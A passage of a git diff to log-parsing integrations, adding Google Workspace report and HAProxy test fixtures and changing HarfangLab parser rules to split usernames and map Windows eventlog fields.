IBAN\"},{\"name\":\"rule_type\",\"value\":\"DLP\"},{\"name\":\"matched_detectors\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"detector_id\",\"value\":\"IBAN_CODE\"},{\"name\":\"detector_type\",\"value\":\"PREDEFINED_DLP\"},{\"name\":\"display_name\",\"value\":\"IBAN_CODE\"}]}]},{\"name\":\"triggered_actions\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"action_type\",\"value\":\"DRIVE_WARN_ON_EXTERNAL_SHARING\"}]}]},{\"name\":\"resource_recipients\",\"multiValue\":[\"john.doe@test.com\"]},{\"name\":\"scan_type\",\"value\":\"DRIVE_ONLINE_SCAN\"},{\"name\":\"severity\",\"value\":\"LOW\"},{\"name\":\"resource_type\",\"value\":\"DOCUMENT\"},{\"name\":\"resource_title\",\"value\":\"8157822-2024-11-7-15-21-0\"}]}]}", + "event": { + "action": "content_matched", + "dataset": "admin#reports#activity", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-07T14:21:46.270000Z", + "cloud": { + "account": { + "id": "C02i38888" + } + }, + "google": { + "report": { + "actor": { + "email": "john.doe@test.com" + }, + "rule": { + "data_source": "DRIVE", + "name": "DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN", + "scan_type": "DRIVE_ONLINE_SCAN", + "severity": "LOW", + "type": "DLP" + } + } + }, + "network": { + "application": "rules" + }, + "related": { + "user": [ + "john.doe" + ] + }, + "user": { + "domain": "test.com", + "email": "john.doe@test.com", + "id": "11332867018361686666666", + "name": "john.doe" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_saml_login_success.json b/Google Cloud/google-report/tests/test_saml_login_success.json new file mode 100644 index 000000000..8a9785816 --- /dev/null +++ b/Google Cloud/google-report/tests/test_saml_login_success.json @@ -0,0 +1,63 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:26:15.515Z\",\"uniqueQualifier\":\"4091348940000000\",\"applicationName\":\"saml\",\"customerId\":\"C00000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"10344515534360000000\"},\"ipAddress\":\"2.1.3.2\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/implementation\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:26:15.515Z\",\"uniqueQualifier\":\"4091348940000000\",\"applicationName\":\"saml\",\"customerId\":\"C00000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"10344515534360000000\"},\"ipAddress\":\"2.1.3.2\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/implementation\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", + "event": { + "action": "login_success", + "category": [ + "authentication" + ], + "dataset": "admin#reports#activity", + "type": [ + "allowed" + ] + }, + "@timestamp": "2024-11-07T14:26:15.515000Z", + "cloud": { + "account": { + "id": "C00000000" + } + }, + "google": { + "report": { + "actor": { + "email": "John.doe@test.com" + }, + "saml": { + "application_name": "AWS", + "initiator": "sp", + "status_code": "SUCCESS_URI" + } + } + }, + "network": { + "application": "saml" + }, + "related": { + "ip": [ + "2.1.3.2" + ], + "user": [ + "John.doe" + ] + }, + "source": { + "address": "2.1.3.2", + "ip": "2.1.3.2" + }, + "user": { + "domain": "test.com", + "email": "John.doe@test.com", + "id": "10344515534360000000", + "name": "John.doe" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_saml_login_success_1.json b/Google Cloud/google-report/tests/test_saml_login_success_1.json new file mode 100644 index 000000000..de8e102d7 --- /dev/null +++ b/Google Cloud/google-report/tests/test_saml_login_success_1.json @@ -0,0 +1,63 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:24:58.191Z\",\"uniqueQualifier\":\"-318965716033600000\",\"applicationName\":\"saml\",\"customerId\":\"C000000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"113844576558700000000\"},\"ipAddress\":\"8.6.15.1\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/dev\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS Client VPN\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:24:58.191Z\",\"uniqueQualifier\":\"-318965716033600000\",\"applicationName\":\"saml\",\"customerId\":\"C000000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"113844576558700000000\"},\"ipAddress\":\"8.6.15.1\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/dev\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS Client VPN\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", + "event": { + "action": "login_success", + "category": [ + "authentication" + ], + "dataset": "admin#reports#activity", + "type": [ + "allowed" + ] + }, + "@timestamp": "2024-11-07T14:24:58.191000Z", + "cloud": { + "account": { + "id": "C000000000" + } + }, + "google": { + "report": { + "actor": { + "email": "John.doe@test.com" + }, + "saml": { + "application_name": "AWS Client VPN", + "initiator": "sp", + "status_code": "SUCCESS_URI" + } + } + }, + "network": { + "application": "saml" + }, + "related": { + "ip": [ + "8.6.15.1" + ], + "user": [ + "John.doe" + ] + }, + "source": { + "address": "8.6.15.1", + "ip": "8.6.15.1" + }, + "user": { + "domain": "test.com", + "email": "John.doe@test.com", + "id": "113844576558700000000", + "name": "John.doe" + } + } +} \ No newline at end of file diff --git a/HAProxy/haproxy/CHANGELOG.md b/HAProxy/haproxy/CHANGELOG.md index 60e2c8a26..9896476a3 100644 --- a/HAProxy/haproxy/CHANGELOG.md +++ b/HAProxy/haproxy/CHANGELOG.md @@ -7,6 +7,10 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0 ## [Unreleased] +## 2024-12.04 - 1.0.1 + +- Add support for aktci at the end of the log + ## 2024-03.04 - 1.0.0 ### Added diff --git a/HAProxy/haproxy/ingest/parser.yml b/HAProxy/haproxy/ingest/parser.yml index 98783cd3d..557604c8a 100644 --- a/HAProxy/haproxy/ingest/parser.yml +++ b/HAProxy/haproxy/ingest/parser.yml @@ -14,7 +14,7 @@ pipeline: ([0-9])%{HOUR}:%{MINUTE}(?::%{SECOND})([0-9]) HAPROXYURL: "(%{URIPROTO:url_scheme}://)?(?:%{USER:url_username}(?::[^@]*)?@)?(?:%{URIHOST:url_domain})?(?:%{URIPATHPARAM:url_path})" TLS_PROTOCOL: "TLS" - HAPROXYHTTPBASE: '%{IP:source_ip}:%{INT:source_port} \[%{HAPROXYDATE}\] %{NOTSPACE} %{NOTSPACE}/%{NOTSPACE} %{INT}/%{INT}/%{INT}/%{INT}/%{NOTSPACE} %{INT:http_response_status_code} %{NOTSPACE:http_response_bytes} %{DATA:http_request_cookie} %{DATA:http_response_cookie} %{NOTSPACE} %{INT}/%{INT}/%{INT}/%{INT}/%{NOTSPACE} %{INT}/%{INT} (\{%{DATA:captured_request_headers}\})?( )?(\{%{DATA:captured_response_headers}\})?( )?"(|(%{WORD:http_request_method} (?:%{HAPROXYURL:url_original})?( HTTP/%{NUMBER:http_version})?))?"( %{TLS_PROTOCOL:tls_protocol}v%{NUMBER:tls_version})?' + HAPROXYHTTPBASE: '%{IP:source_ip}:%{INT:source_port} \[%{HAPROXYDATE}\] %{NOTSPACE} %{NOTSPACE}/%{NOTSPACE} %{INT}/%{INT}/%{INT}/%{INT}/%{NOTSPACE} %{INT:http_response_status_code} %{NOTSPACE:http_response_bytes} %{DATA:http_request_cookie} %{DATA:http_response_cookie} %{NOTSPACE} %{INT}/%{INT}/%{INT}/%{INT}/%{NOTSPACE} %{INT}/%{INT} (\{%{DATA:captured_request_headers}\})?( )?(\{%{DATA:captured_response_headers}\})?( )?"(|(%{WORD:http_request_method} (?:%{HAPROXYURL:url_original})?( HTTP/%{NUMBER:http_version})?))?"( %{TLS_PROTOCOL:tls_protocol}v%{NUMBER:tls_version})?%{GREEDYDATA}' - name: json filter: "{{grok.message.json_msg | length > 0}}" diff --git a/HAProxy/haproxy/tests/access4.json b/HAProxy/haproxy/tests/access4.json new file mode 100644 index 000000000..89630f6bc --- /dev/null +++ b/HAProxy/haproxy/tests/access4.json @@ -0,0 +1,45 @@ +{ + "input": { + "message": "90.83.225.109:54761 [10/Apr/2024:15:41:58.284] frontend_https~ backend_lb/LB100 1796/0/0/28/1824 200 1060 - - --VN 296/296/33/6/0 0/0 {saas.ms.example.com} \"GET /path/get/resource HTTP/1.1\" TLSv1.2 aktci:\"46.193.65.202\"\n", + "sekoiaio": { + "intake": { + "dialect": "HAProxy", + "dialect_uuid": "ff1873e7-8757-4b1a-b0ca-b33f9b27f3d9" + } + } + }, + "expected": { + "message": "90.83.225.109:54761 [10/Apr/2024:15:41:58.284] frontend_https~ backend_lb/LB100 1796/0/0/28/1824 200 1060 - - --VN 296/296/33/6/0 0/0 {saas.ms.example.com} \"GET /path/get/resource HTTP/1.1\" TLSv1.2 aktci:\"46.193.65.202\"\n", + "event": { + "kind": "access" + }, + "http": { + "request": { + "method": "GET" + }, + "response": { + "bytes": 1060, + "status_code": 200 + }, + "version": "1.1" + }, + "related": { + "ip": [ + "90.83.225.109" + ] + }, + "source": { + "address": "90.83.225.109", + "ip": "90.83.225.109", + "port": 54761 + }, + "tls": { + "version": "1.2", + "version_protocol": "TLS" + }, + "url": { + "original": "/path/get/resource", + "path": "/path/get/resource" + } + } +} \ No newline at end of file diff --git a/HarfangLab/harfanglab/CHANGELOG.md b/HarfangLab/harfanglab/CHANGELOG.md index b51c03c58..020bfb34e 100644 --- a/HarfangLab/harfanglab/CHANGELOG.md +++ b/HarfangLab/harfanglab/CHANGELOG.md @@ -7,7 +7,13 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0 ## [Unreleased] -### 2024-10-01 +### 2024-12-11 - 1.3.0 + +### Changed + +- Split username into `user.name` and `user.domain` + +### 2024-10-01 - 1.2.0 ### Added diff --git a/HarfangLab/harfanglab/_meta/fields.yml b/HarfangLab/harfanglab/_meta/fields.yml index 611f3c079..1ad5ffb1e 100644 --- a/HarfangLab/harfanglab/_meta/fields.yml +++ b/HarfangLab/harfanglab/_meta/fields.yml @@ -953,6 +953,11 @@ action.properties.param9: name: action.properties.param9 type: keyword +harfanglab.agent_ids: + description: '' + name: harfanglab.agent_ids + type: keyword + harfanglab.aggregation_key: description: The key to the events aggregation name: harfanglab.aggregation_key @@ -1038,6 +1043,11 @@ harfanglab.threat_id: name: harfanglab.threat_id type: keyword +harfanglab.threat_key: + description: The key of the threat + name: harfanglab.threat_key + type: keyword + network.direction: description: The direction of the network connection name: network.direction diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml index 7ff16f6df..2b8fb9c96 100644 --- a/HarfangLab/harfanglab/ingest/parser.yml +++ b/HarfangLab/harfanglab/ingest/parser.yml @@ -29,6 +29,14 @@ pipeline: input_field: "{{json_event.message.event_data.TaskContent}}" output_field: message + - name: parse_task_info_2 + filter: "{{json_event.message.eventlog.event_data.TaskContent != null and ' 0}}" network_info: actions: @@ -149,7 +171,16 @@ stages: process.pid: "{{json_event.message.pid}}" process.executable: "{{json_event.message.image_name}}" - user.name: "{{json_event.message.username}}" + user.name: > + {%- if '\\' not in json_event.message.username -%} + {{ json_event.message.username }} + {%- else -%} + {{ json_event.message.username.split('\\')[1] }} + {%- endif -%} + user.domain: > + {%- if '\\' in json_event.message.username -%} + {{ json_event.message.username.split('\\')[0] }} + {%- endif -%} event.category: ["network"] event.type: ["connection"] @@ -170,7 +201,6 @@ stages: process.pe.company: "{{json_event.message.pe_info.company_name}}" process.pe.product: "{{json_event.message.pe_info.product_name}}" process.executable: "{{json_event.message.image_name}}" - user.name: "{{json_event.message.username}}" process.parent.executable: "{{json_event.message.parent_image}}" process.parent.command_line: "{{json_event.message.parent_commandline}}" process.parent.name: '{{json_event.message.parent_image.split("\\") | last}}' @@ -180,6 +210,17 @@ stages: harfanglab.grandparent.process.command_line: "{{json_event.message.parent_commandline}}" harfanglab.grandparent.process.ancestors: "{{json_event.message.ancestors.split('|')}}" + user.name: > + {%- if '\\' not in json_event.message.username -%} + {{ json_event.message.username }} + {%- else -%} + {{ json_event.message.username.split('\\')[1] }} + {%- endif -%} + user.domain: > + {%- if '\\' in json_event.message.username -%} + {{ json_event.message.username.split('\\')[0] }} + {%- endif -%} + event.category: ["process"] event.type: ["start"] - set: @@ -211,6 +252,7 @@ stages: alert_info: actions: - set: + event.kind: "alert" harfanglab.level: "{{json_event.message.level}}" rule.description: "{{json_event.message.msg}}" rule.name: "{{json_event.message.rule_name}}" @@ -224,6 +266,7 @@ stages: harfanglab.aggregation_key: "{{json_event.message.aggregation_key}}" harfanglab.process.powershell.command: "{{json_event.message.details_powershell.PowershellCommand}}" harfanglab.process.powershell.script_path: "{{json_event.message.details_powershell.PowershellScriptPath}}" + harfanglab.threat_key: "{{json_event.message.threat_key}}" alert_process_info: actions: @@ -238,7 +281,17 @@ stages: process.pe.product: "{{json_event.message.process.pe_info.product_name}}" process.executable: "{{json_event.message.process.image_name}}" - user.name: "{{json_event.message.process.username}}" + + user.name: > + {%- if '\\' not in json_event.message.process.username -%} + {{ json_event.message.process.username }} + {%- else -%} + {{ json_event.message.process.username.split('\\')[1] }} + {%- endif -%} + user.domain: > + {%- if '\\' in json_event.message.process.username -%} + {{ json_event.message.process.username.split('\\')[0] }} + {%- endif -%} process.parent.executable: "{{json_event.message.process.parent_image}}" process.parent.command_line: "{{json_event.message.process.parent_commandline}}" @@ -277,8 +330,9 @@ stages: event.type: ["info"] event.provider: "{{json_event.message.source_name}}" event.code: "{{json_event.message.event_id|string}}" - source.ip: "{{json_event.message.event_data.IpAddress}}" action.id: "{{json_event.message.event_id}}" + + - set: user.name: "{{json_event.message.event_data.SubjectUserName}}" user.domain: "{{json_event.message.event_data.SubjectDomainName}}" user.target.name: "{{json_event.message.event_data.TargetUserName}}" @@ -474,6 +528,213 @@ stages: action.properties.param9: "{{json_event.message.event_data.get('param9')}}" action.properties.TaskContentNew_Command: "{{parse_task_info.message.Task.Actions.Exec.Command}}" action.properties.TaskContentNew_Args: "{{parse_task_info.message.Task.Actions.Exec.Arguments}}" + filter: "{{json_event.message.event_data != null}}" + + - set: + source.ip: "{{json_event.message.event_data.IpAddress}}" + filter: "{{json_event.message.event_data.IpAddress | is_ipaddress}}" + + - set: + user.name: "{{json_event.message.eventlog.event_data.SubjectUserName}}" + user.domain: "{{json_event.message.eventlog.event_data.SubjectDomainName}}" + user.target.name: "{{json_event.message.eventlog.event_data.TargetUserName}}" + user.target.domain: "{{json_event.message.eventlog.event_data.TargetDomainName}}" + action.properties.DeviceID: "{{json_event.message.eventlog.event_data.DeviceId}}" + action.properties.ASsecurityintelligencecreationtime: "{{json_event.message.eventlog.event_data.get('AS security intelligence creation time')}}" + action.properties.ASsecurityintelligenceversion: "{{json_event.message.eventlog.event_data.get('AS security intelligence version')}}" + action.properties.AVsecurityintelligencecreationtime: "{{json_event.message.eventlog.event_data.get('AV security intelligence creation time')}}" + action.properties.AVsecurityintelligenceversion: "{{json_event.message.eventlog.event_data.get('AV security intelligence version')}}" + action.properties.AccessList: "{{json_event.message.eventlog.event_data.get('AccessList')}}" + action.properties.AccessMask: "{{json_event.message.eventlog.event_data.get('AccessMask')}}" + action.properties.AccessReason: "{{json_event.message.eventlog.event_data.get('AccessReason')}}" + action.properties.ActionID: "{{json_event.message.eventlog.event_data.get('Action ID')}}" + action.properties.ActionName: "{{json_event.message.eventlog.event_data.get('Action Name')}}" + action.properties.AdditionalActionsID: "{{json_event.message.eventlog.event_data.get('Additional Actions ID')}}" + action.properties.AdditionalActionsString: "{{json_event.message.eventlog.event_data.get('Additional Actions String')}}" + action.properties.AuthenticationPackageName: "{{json_event.message.eventlog.event_data.get('AuthenticationPackageName')}}" + action.properties.BMstate: "{{json_event.message.eventlog.event_data.get('BM state')}}" + action.properties.CacheState: "{{json_event.message.eventlog.event_data.get('CacheState')}}" + action.properties.CallerProcessId: "{{json_event.message.eventlog.event_data.get('CallerProcessId')}}" + action.properties.CallerProcessName: "{{json_event.message.eventlog.event_data.get('CallerProcessName')}}" + action.properties.CategoryID: "{{json_event.message.eventlog.event_data.get('Category ID')}}" + action.properties.CategoryName: "{{json_event.message.eventlog.event_data.get('Category Name')}}" + action.properties.CertIssuerName: "{{json_event.message.eventlog.event_data.get('CertIssuerName')}}" + action.properties.CertSerialNumber: "{{json_event.message.eventlog.event_data.get('CertSerialNumber')}}" + action.properties.CertThumbprint: "{{json_event.message.eventlog.event_data.get('CertThumbprint')}}" + action.properties.ClientProcessId: "{{json_event.message.eventlog.event_data.get('ClientProcessId')}}" + action.properties.ClientProcessStartKey: "{{json_event.message.eventlog.event_data.get('ClientProcessStartKey')}}" + action.properties.DetectionID: "{{json_event.message.eventlog.event_data.get('Detection ID')}}" + action.properties.DetectionTime: "{{json_event.message.eventlog.event_data.get('Detection Time')}}" + action.properties.DetectionUser: "{{json_event.message.eventlog.event_data.get('Detection User')}}" + action.properties.Domain: "{{json_event.message.eventlog.event_data.get('Domain')}}" + action.properties.ElevatedToken: "{{json_event.message.eventlog.event_data.get('ElevatedToken')}}" + action.properties.EngineVersion: "{{json_event.message.eventlog.event_data.get('Engine Version')}}" + action.properties.Engineup-to-date: "{{json_event.message.eventlog.event_data.get('Engine up-to-date')}}" + action.properties.Engineversion: "{{json_event.message.eventlog.event_data.get('Engine version')}}" + action.properties.ErrorCode: "{{json_event.message.eventlog.event_data.get('Error Code')}}" + action.properties.ErrorDescription: "{{json_event.message.eventlog.event_data.get('Error Description')}}" + action.properties.ExecutionID: "{{json_event.message.eventlog.event_data.get('Execution ID')}}" + action.properties.ExecutionName: "{{json_event.message.eventlog.event_data.get('Execution Name')}}" + action.properties.FQDN: "{{json_event.message.eventlog.event_data.get('FQDN')}}" + action.properties.FWLink: "{{json_event.message.eventlog.event_data.get('FWLink')}}" + action.properties.FailureReason: "{{json_event.message.eventlog.event_data.get('FailureReason')}}" + action.properties.FileNameBuffer: "{{json_event.message.eventlog.event_data.get('FileNameBuffer')}}" + action.properties.FileNameLength: "{{json_event.message.eventlog.event_data.get('FileNameLength')}}" + action.properties.Flags: "{{json_event.message.eventlog.event_data.get('Flags')}}" + action.properties.Hash: "{{json_event.message.eventlog.event_data.get('Hash')}}" + action.properties.HashSize: "{{json_event.message.eventlog.event_data.get('Hash Size')}}" + action.properties.IOAVstate: "{{json_event.message.eventlog.event_data.get('IOAV state')}}" + action.properties.ImpersonationLevel: "{{json_event.message.eventlog.event_data.get('ImpersonationLevel')}}" + action.properties.IpAddress: "{{json_event.message.eventlog.event_data.get('IpAddress')}}" + action.properties.IpPort: "{{json_event.message.eventlog.event_data.get('IpPort')}}" + action.properties.IssuerName: "{{json_event.message.eventlog.event_data.get('IssuerName')}}" + action.properties.IssuerNameLength: "{{json_event.message.eventlog.event_data.get('IssuerNameLength')}}" + action.properties.IssuerTBSHash: "{{json_event.message.eventlog.event_data.get('IssuerTBSHash')}}" + action.properties.IssuerTBSHashSize: "{{json_event.message.eventlog.event_data.get('IssuerTBSHashSize')}}" + action.properties.KeyLength: "{{json_event.message.eventlog.event_data.get('KeyLength')}}" + action.properties.LastASsecurityintelligenceage: "{{json_event.message.eventlog.event_data.get('Last AS security intelligence age')}}" + action.properties.LastAVsecurityintelligenceage: "{{json_event.message.eventlog.event_data.get('Last AV security intelligence age')}}" + action.properties.Lastfullscanage: "{{json_event.message.eventlog.event_data.get('Last full scan age')}}" + action.properties.Lastfullscanendtime: "{{json_event.message.eventlog.event_data.get('Last full scan end time')}}" + action.properties.Lastfullscansource: "{{json_event.message.eventlog.event_data.get('Last full scan source')}}" + action.properties.Lastfullscanstarttime: "{{json_event.message.eventlog.event_data.get('Last full scan start time')}}" + action.properties.Lastquickscanage: "{{json_event.message.eventlog.event_data.get('Last quick scan age')}}" + action.properties.Lastquickscanendtime: "{{json_event.message.eventlog.event_data.get('Last quick scan end time')}}" + action.properties.Lastquickscansource: "{{json_event.message.eventlog.event_data.get('Last quick scan source')}}" + action.properties.Lastquickscanstarttime: "{{json_event.message.eventlog.event_data.get('Last quick scan start time')}}" + action.properties.Latestengineversion: "{{json_event.message.eventlog.event_data.get('Latest engine version')}}" + action.properties.Latestplatformversion: "{{json_event.message.eventlog.event_data.get('Latest platform version')}}" + action.properties.LmPackageName: "{{json_event.message.eventlog.event_data.get('LmPackageName')}}" + action.properties.LogonGuid: "{{json_event.message.eventlog.event_data.get('LogonGuid')}}" + action.properties.LogonProcessName: "{{json_event.message.eventlog.event_data.get('LogonProcessName')}}" + action.properties.LogonType: "{{json_event.message.eventlog.event_data.get('LogonType')}}" + action.properties.MemberName: "{{(json_event.message.eventlog.event_data.get('MemberName').split('\\\\')[-1]) or (parse_member_name_2.message.first_name + ' ' + parse_member_name_2.message.last_name)}}" + action.properties.CompatibleIds: "{{json_event.message.eventlog.event_data.get('CompatibleIds')}}" + action.properties.NRIengineversion: "{{json_event.message.eventlog.event_data.get('NRI engine version')}}" + action.properties.NRIsecurityintelligenceversion: "{{json_event.message.eventlog.event_data.get('NRI security intelligence version')}}" + action.properties.NotValidAfter: "{{json_event.message.eventlog.event_data.get('NotValidAfter')}}" + action.properties.NotValidBefore: "{{json_event.message.eventlog.event_data.get('NotValidBefore')}}" + action.properties.OAstate: "{{json_event.message.eventlog.event_data.get('OA state')}}" + action.properties.ObjectType: "{{json_event.message.eventlog.event_data.get('ObjectType')}}" + action.properties.OriginID: "{{json_event.message.eventlog.event_data.get('Origin ID')}}" + action.properties.OriginName: "{{json_event.message.eventlog.event_data.get('Origin Name')}}" + action.properties.PageHash: "{{json_event.message.eventlog.event_data.get('PageHash')}}" + action.properties.ParentProcessId: "{{json_event.message.eventlog.event_data.get('ParentProcessId')}}" + action.properties.Path: "{{json_event.message.eventlog.event_data.get('Path')}}" + action.properties.Platformup-to-date: "{{json_event.message.eventlog.event_data.get('Platform up-to-date')}}" + action.properties.Platformversion: "{{json_event.message.eventlog.event_data.get('Platform version')}}" + action.properties.PolicyBits: "{{json_event.message.eventlog.event_data.get('PolicyBits')}}" + action.properties.PostCleanStatus: "{{json_event.message.eventlog.event_data.get('Post Clean Status')}}" + action.properties.PreAuthType: "{{json_event.message.eventlog.event_data.get('PreAuthType')}}" + action.properties.PreExecutionStatus: "{{json_event.message.eventlog.event_data.get('Pre Execution Status')}}" + action.properties.PrivilegeList: "{{json_event.message.eventlog.event_data.get('PrivilegeList')}}" + action.properties.ProcessId: "{{json_event.message.eventlog.event_data.get('ProcessId')}}" + action.properties.ProcessName: "{{json_event.message.eventlog.event_data.get('Process Name') or json_event.message.eventlog.event_data.get('ProcessName')}}" + action.properties.ProcessNameBuffer: "{{json_event.message.eventlog.event_data.get('ProcessNameBuffer')}}" + action.properties.ProcessNameLength: "{{json_event.message.eventlog.event_data.get('ProcessNameLength')}}" + action.properties.ProductName: "{{json_event.message.eventlog.event_data.get('Product Name')}}" + action.properties.ProductVersion: "{{json_event.message.eventlog.event_data.get('Product Version')}}" + action.properties.Productstatus: "{{json_event.message.eventlog.event_data.get('Product status')}}" + action.properties.ProfileChanged: "{{json_event.message.eventlog.event_data.get('ProfileChanged')}}" + action.properties.PublisherName: "{{json_event.message.eventlog.event_data.get('PublisherName')}}" + action.properties.PublisherNameLength: "{{json_event.message.eventlog.event_data.get('PublisherNameLength')}}" + action.properties.PublisherTBSHash: "{{json_event.message.eventlog.event_data.get('PublisherTBSHash')}}" + action.properties.PublisherTBSHashSize: "{{json_event.message.eventlog.event_data.get('PublisherTBSHashSize')}}" + action.properties.RTPstate: "{{json_event.message.eventlog.event_data.get('RTP state')}}" + action.properties.RelativeTargetName: "{{json_event.message.eventlog.event_data.get('RelativeTargetName')}}" + action.properties.RemediationUser: "{{json_event.message.eventlog.event_data.get('Remediation User')}}" + action.properties.RequestedPolicy: "{{json_event.message.eventlog.event_data.get('RequestedPolicy')}}" + action.properties.RequestedSigningLevel: "{{json_event.message.eventlog.event_data.get('RequestedSigningLevel')}}" + action.properties.RestrictedAdminMode: "{{json_event.message.eventlog.event_data.get('RestrictedAdminMode')}}" + action.properties.RpcCallClientLocality: "{{json_event.message.eventlog.event_data.get('RpcCallClientLocality')}}" + action.properties.RuleId: "{{json_event.message.eventlog.event_data.get('RuleId')}}" + action.properties.RuleName: "{{json_event.message.eventlog.event_data.get('RuleName')}}" + action.properties.ScriptBlockText: "{{json_event.message.eventlog.event_data.get('ScriptBlockText')}}" + action.properties.SecureRequired: "{{json_event.message.eventlog.event_data.get('SecureRequired')}}" + action.properties.SecurityintelligenceVersion: "{{json_event.message.eventlog.event_data.get('Security intelligence Version')}}" + action.properties.ServiceName: "{{json_event.message.eventlog.event_data.get('ServiceName')}}" + action.properties.ServiceSid: "{{json_event.message.eventlog.event_data.get('ServiceSid')}}" + action.properties.SeverityID: "{{json_event.message.eventlog.event_data.get('Severity ID')}}" + action.properties.SeverityName: "{{json_event.message.eventlog.event_data.get('Severity Name')}}" + action.properties.ShareLocalPath: "{{json_event.message.eventlog.event_data.get('ShareLocalPath')}}" + action.properties.ShareName: "{{json_event.message.eventlog.event_data.get('ShareName')}}" + action.properties.Signature: "{{json_event.message.eventlog.event_data.get('Signature')}}" + action.properties.SignatureType: "{{json_event.message.eventlog.event_data.get('SignatureType')}}" + action.properties.SourceID: "{{json_event.message.eventlog.event_data.get('Source ID')}}" + action.properties.SourceName: "{{json_event.message.eventlog.event_data.get('Source Name')}}" + action.properties.State: "{{json_event.message.eventlog.event_data.get('State')}}" + action.properties.Status: "{{json_event.message.eventlog.event_data.get('Status')}}" + action.properties.StatusCode: "{{json_event.message.eventlog.event_data.get('Status Code')}}" + action.properties.StatusDescription: "{{json_event.message.eventlog.event_data.get('Status Description')}}" + action.properties.SubStatus: "{{json_event.message.eventlog.event_data.get('SubStatus')}}" + action.properties.SubjectDomainName: "{{json_event.message.eventlog.event_data.get('SubjectDomainName')}}" + action.properties.SubjectLogonId: "{{json_event.message.eventlog.event_data.get('SubjectLogonId')}}" + action.properties.SubjectUserName: "{{json_event.message.eventlog.event_data.get('SubjectUserName')}}" + action.properties.SubjectUserSid: "{{json_event.message.eventlog.event_data.get('SubjectUserSid')}}" + action.properties.TargetDomainName: "{{json_event.message.eventlog.event_data.get('TargetDomainName')}}" + action.properties.TargetInfo: "{{json_event.message.eventlog.event_data.get('TargetInfo')}}" + action.properties.TargetLinkedLogonId: "{{json_event.message.eventlog.event_data.get('TargetLinkedLogonId')}}" + action.properties.TargetLogonGuid: "{{json_event.message.eventlog.event_data.get('TargetLogonGuid')}}" + action.properties.TargetLogonId: "{{json_event.message.eventlog.event_data.get('TargetLogonId')}}" + action.properties.TargetOutboundDomainName: "{{json_event.message.eventlog.event_data.get('TargetOutboundDomainName')}}" + action.properties.TargetOutboundUserName: "{{json_event.message.eventlog.event_data.get('TargetOutboundUserName')}}" + action.properties.TargetServerName: "{{json_event.message.eventlog.event_data.get('TargetServerName')}}" + action.properties.TargetSid: "{{json_event.message.eventlog.event_data.get('TargetSid')}}" + action.properties.TargetUserName: "{{json_event.message.eventlog.event_data.get('TargetUserName')}}" + action.properties.TargetUserSid: "{{json_event.message.eventlog.event_data.get('TargetUserSid')}}" + action.properties.TaskContent: "{{json_event.message.eventlog.event_data.get('TaskContent')}}" + action.properties.TaskName: "{{json_event.message.eventlog.event_data.get('TaskName')}}" + action.properties.ThreatID: "{{json_event.message.eventlog.event_data.get('Threat ID')}}" + action.properties.ThreatName: "{{json_event.message.eventlog.event_data.get('Threat Name')}}" + action.properties.TicketEncryptionType: "{{json_event.message.eventlog.event_data.get('TicketEncryptionType')}}" + action.properties.TicketOptions: "{{json_event.message.eventlog.event_data.get('TicketOptions')}}" + action.properties.TotalSignatureCount: "{{json_event.message.eventlog.event_data.get('TotalSignatureCount')}}" + action.properties.TransmittedServices: "{{json_event.message.eventlog.event_data.get('TransmittedServices')}}" + action.properties.TypeID: "{{json_event.message.eventlog.event_data.get('Type ID')}}" + action.properties.TypeName: 